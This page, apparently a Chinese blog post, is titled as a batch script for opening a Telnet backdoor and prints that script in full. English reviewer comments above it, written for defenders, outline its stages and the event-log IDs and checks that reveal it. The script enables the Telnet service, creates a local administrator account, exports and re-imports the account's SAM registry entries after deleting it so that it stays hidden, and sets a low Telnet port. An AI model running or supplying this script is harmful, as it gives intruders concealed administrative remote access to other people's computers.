批处理开启TelNet后门

    技术2024-10-18  4

    rem Reviewer annotations, written for defenders. The code below is unchanged.
    rem Purpose: interactive batch script that enables the Windows Telnet
    rem service and prepares a local administrator account for Telnet logon.
    rem
    rem Stages, in the order they appear:
    rem  1. Exits unless tlntsvr.exe exists under system32, then sets the
    rem     tlntsvr service to automatic start and starts it.
    rem  2. Prompts for a user name, a password typed twice and a port that
    rem     must be numeric and between 1 and 1023, then echoes all three,
    rem     password included, to the console for confirmation.
    rem  3. Changes to the TEMP directory, creates the account with net user,
    rem     removes it from the users group and adds it to administrators.
    rem  4. Writes regset.ini and runs regini against the SAM keys, exports the
    rem     Names entry for the account to 1.reg, reads a value from 1.reg with
    rem     for /f to build the matching Users key name, exports that key to
    rem     2.reg, deletes the account with net user, then imports both files.
    rem     As written, the account data is put back into the SAM hive after
    rem     the account was deleted through the normal tool.
    rem     NOTE review: the bracketed numbers are regini permission codes,
    rem     confirm their meaning against the regini documentation.
    rem  5. Deletes 1.reg, 2.reg and regset.ini, writes [17] on the top SAM key,
    rem     creates the TelnetClients group, sets its comment and adds the
    rem     account to it.
    rem  6. Sets the Telnet port with tlntadmn, prints the user name and the
    rem     password again, and loops on telnet 127.0.0.1 as a self test.
    rem
    rem What a defender can check, assuming account management auditing and
    rem process creation logging are enabled:
    rem  - Security log: account created 4720, local group created 4731,
    rem    member added 4732, member removed 4733, account deleted 4726.
    rem    A 4720 followed shortly by a 4726 for the same name, with an
    rem    administrators 4732 in between, matches stages 3 and 4.
    rem  - System log: 7040 for the tlntsvr start type change.
    rem  - Process creation records for sc, net, regini, reg and tlntadmn
    rem    started from a single cmd session, and regini or reg touching
    rem    paths under the SAM hive.
    rem  - Compare the accounts reported by the usual account tools with the
    rem    entries under the SAM Names key. Verify on a test system whether
    rem    they differ for this technique.
    rem  - tlntsvr listening on a port below 1024, and members of the
    rem    TelnetClients and administrators groups that nobody provisioned.
    rem  - Telnet traffic is not encrypted, so a password used over it should
    rem    be treated as exposed and rotated during cleanup.
    @echo off title 生成Telnet远程登录 setlocal enabledelayedexpansion if not exist "%windir%/system32/tlntsvr.exe" ( echo 找不到Telnet服务文件,请退出 pause exit ) sc config tlntsvr start= auto sc start tlntsvr cls :a set /p user=请输入用于Telnet登录的用户名: if "!user!"=="" ( echo 用户名不能为空 goto a ) set /p psw=请输入用于Telnet登录的密码: set /p pswb=再次输入密码: if not !psw!==!pswb! ( cls echo 两次输入的密码不相同! goto a ) :b set /p port=请输入要设置的Telnet服务端口,必须是小于1024的正整数: echo !port!|findstr "^[0-9]*$">nul if !errorlevel!==1 ( echo 请输入纯数字! goto b ) if !port! lss 1 ( echo 请输入小于1024的正整数! echo 请输入大于1小于1024的整数! goto b ) if !port! geq 1024 ( echo 请输入小于1024的正整数! goto b ) cls echo 用户名:!user! echo 密码:!psw! echo 端口:!port! set /p y=确定吗?(y,n): if not !y!==y ( cls goto a ) cd %temp% net user "!user!" "!psw!" /add net localgroup users "!user!" /del net localgroup administrators "!user!" /add echo HKEY_LOCAL_MACHINE/SAM/SAM [1 8 19] >regset.ini echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account [1 8 9] >>regset.ini echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users [1 8 9] >>regset.ini echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names [1 8 9] >>regset.ini echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/!user! [1 8 9] >>regset.ini regini regset.ini reg export "HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/!user!" 1.reg for /f "usebackq skip=3 tokens=2 delims=(" %%j in (`type 1.reg`) do set tt=%%j echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/00000!tt:~0,-2! [1 8 9] >regset.ini regini regset.ini reg export "HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/00000!tt:~0,-2!" 2.reg net user "!user!" /del reg import 1.reg reg import 2.reg del /f /a /q 1.reg del /f /a /q 2.reg echo HKEY_LOCAL_MACHINE/SAM/SAM [17] >regset.ini regini regset.ini del /f /a /q regset.ini net localgroup TelnetClients /add net localgroup telnetclients /comment:"TelnetClients 组中的成员被赋予远程登录计算机的权限" net localgroup TelnetClients "!user!" /add cls color a tlntadmn config port= !port! echo 开始测试Telnet服务! echo 登录用户名为:!user! ,密码是:!psw! 
echo Telnet的端口为:!port! pause :c telnet 127.0.0.1 !port! if not !username!==$ ( echo 没有登录,重新测试吗? echo 已经登录过了,请直接关闭本窗口! pause goto c )  
